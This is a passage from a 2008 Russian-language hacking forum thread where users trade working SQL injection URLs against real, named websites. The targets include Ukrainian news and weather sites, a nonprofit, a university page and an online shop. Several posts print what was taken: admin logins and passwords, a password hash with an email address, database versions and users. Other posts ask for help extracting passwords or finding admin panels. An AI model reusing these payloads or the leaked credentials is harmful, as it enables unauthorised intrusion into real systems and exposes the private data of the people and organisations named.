ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #6001  
Старый 15.07.2008, 00:14
Аватар для sabe
sabe
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552

Репутация: 568
Отправить сообщение для sabe с помощью ICQ Отправить сообщение для sabe с помощью AIM Отправить сообщение для sabe с помощью Yahoo
По умолчанию

RBC.ua - РБК Украина - PR 5

мой любимый способ вывода - в .txt
Цитата:
http://marketing.rbc.ua/file.php?id=99999+union+select+concat_ws(0x3a,user ,password),2,3+from+mysql.user/*
root: а пасса поидее нету

шелл не зальеш ( фильтруются кавычки..

теперь пойдем по субдомменах..

Цитата:
http://marketing.rbc.ua/file.php?id=99999+union+select+concat_ws(0x3a,logi n,pass),2,3+from+presscenter.sys_user/*
Press.rbc.ua/admin/
admin;5660511

Цитата:
http://marketing.rbc.ua/file.php?id=99999+union+select+concat_ws(0x3a,logi n,pass),2,3+from+radio.sys_user/*
Radio.rbc.ua/admin/
admin;5660511

Цитата:
http://marketing.rbc.ua/file.php?id=99999+union+select+concat_ws(0x3a,logi n,password),2,3+from+rbc_research.rbc_users/*
Research.rbc.ua
shultz:shultz

бд большая - рут. найти можно много интересного..


Pogoda.ua- PR 4
Цитата:
http://www.pogoda.ua/index.php?id=999999+union+select+1,concat_ws(0x3a, version(),user(),database()),3,4,5/*
увы 4 мускул. хехе угадал табличку.....
Цитата:
http://www.pogoda.ua/index.php?id=999999+union+select+1,concat_ws(0x3a, login,password),3,4,5+from+users/*
InnovateOnline.info - PR 6
Цитата:
http://innovateonline.info/index.php?view=article&id=9999999+union+select+1,c oncat_ws(0x3a,password)+from+innovate.person_accou nt/*
пассы...
Цитата:
http://innovateonline.info/index.php?view=article&id=9999999+union+select+1,c oncat_ws(0x3a,email)+from+innovate.person/*
мыла...
Цитата:
http://innovateonline.info/index.php?view=article&id=9999999+union+select+1,c oncat_ws(0x3a,user_login,user_pass)+from+innovate_ jobs.wp_users/*
WP - токо где он ?

пс: второй домен webhost.fgsweb.fgsehs.nova.edu


Effective.net.ua
Цитата:
http://www.effective.net.ua/show_obj.php?a=-1+union+select+1,2,3,4,5,6,7,version(),9,10,11,12, 13,14,15,16,17/*
Ekip.com.ua
Цитата:
http://ekip.com.ua/index.php?id=623+union+select+1,2,3,4,5,6,7,8,9,10 ,11,12,13,14,15--
вывод необнаружен..(

Последний раз редактировалось sabe; 03.08.2008 в 19:10..
 
Ответить с цитированием

  #6002  
Старый 15.07.2008, 10:43
Аватар для 2la.painkiller
2la.painkiller
Новичок
Регистрация: 22.05.2008
Сообщений: 27
Провел на форуме:
80944

Репутация: 0
По умолчанию

Хотел доработать
http://www.stumptuous.com/cms/
админку не могу найти =) поскажите плиз
 
Ответить с цитированием

  #6003  
Старый 15.07.2008, 11:52
Аватар для BizzyD
BizzyD
Участник форума
Регистрация: 02.06.2007
Сообщений: 210
Провел на форуме:
1172175

Репутация: 252
Отправить сообщение для BizzyD с помощью ICQ
По умолчанию

Код:
http://www.mdiecast.com/manufacturerinfo.php?manname=99999+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15/*
попробуйте подобрать поля с паролями.. оч нужно
 
Ответить с цитированием

  #6004  
Старый 15.07.2008, 12:09
Аватар для 2la.painkiller
2la.painkiller
Новичок
Регистрация: 22.05.2008
Сообщений: 27
Провел на форуме:
80944

Репутация: 0
По умолчанию

http://www.mdiecast.com/manufacturerinfo.php?manname=-1+order+by+15
15 штук

4.1.22-standard
удачи
+)

Последний раз редактировалось 2la.painkiller; 15.07.2008 в 12:11..
 
Ответить с цитированием

  #6005  
Старый 15.07.2008, 12:13
Аватар для BanQui
BanQui
Познающий
Регистрация: 10.07.2008
Сообщений: 70
Провел на форуме:
203452

Репутация: 36
По умолчанию

http://www.hyoro.net/Azur/ - Люди ента кп подается мускл???? Чтото странное какието ошибки внизу и по бокам!!! Посмарите плиз!!!
 
Ответить с цитированием

  #6006  
Старый 15.07.2008, 12:33
Аватар для beerhack
beerhack
Участник форума
Регистрация: 01.03.2008
Сообщений: 149
Провел на форуме:
3395070

Репутация: 173
По умолчанию

http://www.terrorfreetomorrow.org/articlenav.php?id=-9999+union+select+1,2,3,4,5,6*

VERSION: 5.0.45-log

passwords
---username
---upassword
---emailaddress
---securitylevel

ahutomo:22261f196a56676d:ahutomo@terrorfreetomorro w.org:1

**************************************
http://www.samarmagazine.org/archive/article.php?id=-99999+union+select+1,2,3,4,5,6,version(),8,9,10,11 ,12,13,14,15/*

VERSION: 5.0.24a-standard-log

**************************************
http://www.eatmybrains.com/showfeature.php?id=-99999+union+select+1,2,3,version(),5,6,7,8,9,10,11 ,12,13,14,15,16/*

VERSION: 4.1.22-standard
 
Ответить с цитированием

  #6007  
Старый 15.07.2008, 12:33
Аватар для nicusor
nicusor
Участник форума
Регистрация: 19.03.2008
Сообщений: 108
Провел на форуме:
1357043

Репутация: 137
По умолчанию

Цитата:
Сообщение от BanQui  
http://www.hyoro.net/Azur/ - Люди ента кп подается мускл???? Чтото странное какието ошибки внизу и по бокам!!! Посмарите плиз!!!
закончилось место для хостинга
 
Ответить с цитированием

  #6008  
Старый 15.07.2008, 12:53
Аватар для $n@ke
$n@ke
Постоянный
Регистрация: 18.09.2006
Сообщений: 867
Провел на форуме:
2805813

Репутация: 1396


По умолчанию

EDU
Цитата:
http://rice-evolution.cornell.edu/riceevol-experiment.php?div_eid=3
юзаем лимит ;-)

Db Ver: 5.0.21-log
Db name: riceevol2
User: rice-evol@localhost
 
Ответить с цитированием

  #6009  
Старый 15.07.2008, 12:59
Аватар для S00pY
S00pY
Познающий
Регистрация: 24.04.2007
Сообщений: 92
Провел на форуме:
2621544

Репутация: 412
Отправить сообщение для S00pY с помощью ICQ
По умолчанию

Цитата:
Сообщение от BizzyD  
Код:
http://www.mdiecast.com/manufacturerinfo.php?manname=99999+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15/*
попробуйте подобрать поля с паролями.. оч нужно
Поле с паролем не нашёл но нашёл таблицу с акками:
_http://www.mdiecast.com/manufacturerinfo.php?manname=-1+union+select+1,login,3,4,5,6,7,8,9,10,11,version (),13,14,15+from+accounts+limit+0,1/*


Ща покопаюсь дальше!




Есть форум ipb http://www.forum.mdiecast.com/ но база скорее всего другая и с ipb_members не читает((

Последний раз редактировалось S00pY; 15.07.2008 в 13:27..
 
Ответить с цитированием

  #6010  
Старый 15.07.2008, 14:24
Аватар для 5taY3r
5taY3r
Познающий
Регистрация: 10.05.2007
Сообщений: 38
Провел на форуме:
453576

Репутация: 100
По умолчанию

Цитата:
Сообщение от BizzyD  
Код:
http://www.mdiecast.com/manufacturerinfo.php?manname=99999+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15/*
попробуйте подобрать поля с паролями.. оч нужно
Код:
http://www.mdiecast.com/manufacturerinfo.php?manname=-1+union+select+1,2,3,4,5,6,concat_ws(0x3a,id,login,email),8,9,10,11,12,13,14,15+from+accounts+limit+0,1/*
Не хватает только пасса, пока ничего не придумаю...
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ